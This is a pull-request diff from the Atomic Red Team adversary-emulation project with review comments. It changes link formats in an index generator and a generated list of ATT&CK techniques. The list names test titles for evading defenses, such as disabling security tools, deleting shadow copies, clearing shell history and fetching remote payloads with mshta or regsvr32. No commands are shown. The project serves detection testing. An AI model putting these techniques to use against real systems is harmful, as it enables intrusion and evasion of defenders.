Merge pull request #171 from redcanaryco/uppercase-everything
Uppercase all the T's - round two
@@ -54,10 +54,10 @@ class AtomicRedTeam
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](#{ROOT_GITHUB_URL}/tree/master/atomics/#{technique_identifier}/#{technique_identifier}.md)"
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, so link to an edit page
"[#{link_display}](#{ROOT_GITHUB_URL}/new/master/atomics/#{technique_identifier}?#{technique_identifier}.md)"
"[#{link_display}](#{ROOT_GITHUB_URL}/blob/uppercase-everything/CONTRIBUTIONS.md)"
end
end
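Review bot: the `else` branch now hard-codes a feature-branch name in the fallback link, `#{ROOT_GITHUB_URL}/blob/uppercase-everything/CONTRIBUTIONS.md`; once this PR is merged and `uppercase-everything` is deleted, every technique without atomics links to a 404. Use `master` (the branch the old `tree/master/...` link assumed) or, better, a repository-relative path in the style of the new `./#{technique_identifier}/#{technique_identifier}.md` link, so the generated index works from any branch or fork. The removed link opened GitHub's new-file page under `atomics/<technique>`; if dropping that in favour of CONTRIBUTIONS.md is intentional, the commit message should say so. Two unchanged context lines merit a follow-up commit: `File.exists?` is deprecated in favour of `File.exist?`, and the comment should read "its Markdown file".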
+283
-283
@@ -1,97 +1,97 @@
# persistence
- [T1156 .bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1156?T1156.md)
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md)
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md)
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md)
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md)
- [T1131 Authentication Package](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1131?T1131.md)
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md)
- [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1067?T1067.md)
- [T1176 Browser Extensions](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1176/T1176.md)
- [T1156 .bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1131 Authentication Package](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode)
- Atomic Test #2: Chrome (Chrome Web Store)
- Atomic Test #3: Firefox
- [T1042 Change Default File Association](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1042?T1042.md)
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md)
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md)
- [T1136 Create Account](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1136/T1136.md)
- [T1042 Change Default File Association](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system
- Atomic Test #2: Create a user account on a MacOS system
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md)
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md)
- [T1133 External Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1133?T1133.md)
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md)
- [T1158 Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md)
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1133 External Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory
- [T1179 Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md)
- [T1179 Hooking](./T1179/T1179.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages
- [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1062?T1062.md)
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md)
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1215?T1215.md)
- [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1161?T1161.md)
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md)
- [T1159 Launch Agent](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1159?T1159.md)
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md)
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md)
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md)
- [T1162 Login Item](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1162?T1162.md)
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md)
- [T1031 Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1031?T1031.md)
- [T1128 Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1128?T1128.md)
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md)
- [T1137 Office Application Startup](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1137?T1137.md)
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md)
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md)
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md)
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md)
- [T1163 Rc.common](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1163?T1163.md)
- [T1164 Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1164?T1164.md)
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md)
- [T1060 Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1060?T1060.md)
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md)
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md)
- [T1180 Screensaver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1180?T1180.md)
- [T1101 Security Support Provider](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1101?T1101.md)
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md)
- [T1023 Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1023?T1023.md)
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md)
- [T1019 System Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1019?T1019.md)
- [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1209?T1209.md)
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md)
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1084?T1084.md)
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1004?T1004.md)
- [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1159 Launch Agent](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1162 Login Item](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1031 Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1128 Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1137 Office Application Startup](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1163 Rc.common](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1164 Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1060 Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1180 Screensaver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1101 Security Support Provider](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1023 Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1019 System Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# defense-evasion
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md)
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md)
- [T1009 Binary Padding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1009?T1009.md)
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md)
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md)
- [T1146 Clear Command History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1146/T1146.md)
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1009 Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1146 Clear Command History](./T1146/T1146.md)
- Atomic Test #1: Clear Bash history (rm)
- Atomic Test #2: Clear Bash history (echo)
- Atomic Test #3: Clear Bash history (cat dev/null)
- Atomic Test #4: Clear Bash history (ln dev/null)
- Atomic Test #5: Clear Bash history (truncate)
- Atomic Test #6: Clear history of a bunch of shells
- [T1116 Code Signing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1116?T1116.md)
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md)
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md)
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md)
- [T1207 DCShadow](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1207?T1207.md)
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md)
- [T1073 DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1073?T1073.md)
- [T1140 Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1140?T1140.md)
- [T1089 Disabling Security Tools](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1089/T1089.md)
- [T1116 Code Signing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1207 DCShadow](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1073 DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1140 Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1089 Disabling Security Tools](./T1089/T1089.md)
- Atomic Test #1: Disable iptables firewall
- Atomic Test #2: Disable syslog
- Atomic Test #3: Disable Cb Response
- Atomic Test #4: Disable SELinux
- [T1211 Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1211?T1211.md)
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md)
- [T1107 File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1107/T1107.md)
- [T1211 Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1107 File Deletion](./T1107/T1107.md)
- Atomic Test #1: Victim configuration
- Atomic Test #2: Delete a single file
- Atomic Test #3: Delete an entire folder
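Review bot: this index is generator output, so the ninety-odd `blob/uppercase-everything/CONTRIBUTIONS.md` links in this hunk all inherit the hard-coded branch name from the generator's `else` branch and will break together when that branch is deleted after merge; fix the branch reference (or switch to a relative link) in the generator and regenerate rather than hand-editing here. The relative `./T1176/T1176.md` form is fine as long as this file stays in `atomics/`. Two test names carried over from the YAML definitions look off and should be corrected at the source so they do not reappear on the next regeneration: `Create a user account on a MacOS system` (macOS) and `Clear Bash history (cat dev/null)` / `(ln dev/null)`, which presumably mean `/dev/null`.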
@@ -105,280 +105,280 @@
- Atomic Test #11: Delete VSS - wmic
- Atomic Test #12: bcdedit
- Atomic Test #13: wbadmin
- [T1006 File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1006?T1006.md)
- [T1144 Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1144?T1144.md)
- [T1148 HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1148/T1148.md)
- [T1158 Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md)
- [T1006 File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1144 Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1148 HISTCONTROL](./T1148/T1148.md)
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory
- [T1147 Hidden Users](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1147?T1147.md)
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1143?T1143.md)
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md)
- [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1054?T1054.md)
- [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1066?T1066.md)
- [T1070 Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1070?T1070.md)
- [T1202 Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1202?T1202.md)
- [T1130 Install Root Certificate](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1130/T1130.md)
- [T1147 Hidden Users](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1070 Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1202 Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1130 Install Root Certificate](./T1130/T1130.md)
- Atomic Test #1: Install root CA on CentOS/RHEL
- [T1118 InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md)
- [T1118 InstallUtil](./T1118/T1118.md)
- Atomic Test #1: InstallUtil uninstall method call
- [T1149 LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1149?T1149.md)
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md)
- [T1036 Masquerading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1036?T1036.md)
- [T1112 Modify Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1112?T1112.md)
- [T1170 Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md)
- [T1149 LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1036 Masquerading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1112 Modify Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
- [T1096 NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1096?T1096.md)
- [T1126 Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1126?T1126.md)
- [T1027 Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1027?T1027.md)
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md)
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md)
- [T1186 Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1186?T1186.md)
- [T1093 Process Hollowing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1093?T1093.md)
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md)
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md)
- [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md)
- [T1096 NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1126 Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1027 Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1186 Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1093 Process Hollowing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test
- Atomic Test #2: Regsvs Uninstall Method Call Test
- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md)
- [T1117 Regsvr32](./T1117/T1117.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution
- Atomic Test #2: Regsvr32 remote COM scriptlet execution
- Atomic Test #3: Regsvr32 local DLL execution
- [T1014 Rootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1014?T1014.md)
- [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md)
- [T1014 Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1085 Rundll32](./T1085/T1085.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md)
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md)
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md)
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md)
- [T1045 Software Packing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1045?T1045.md)
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md)
- [T1099 Timestomp](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1099/T1099.md)
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1045 Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1099 Timestomp](./T1099/T1099.md)
- Atomic Test #1: Set a file's access timestamp
- Atomic Test #2: Set a file's modification timestamp
- Atomic Test #3: Set a file's creation timestamp
- [T1127 Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# privilege-escalation
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md)
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md)
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md)
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md)
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md)
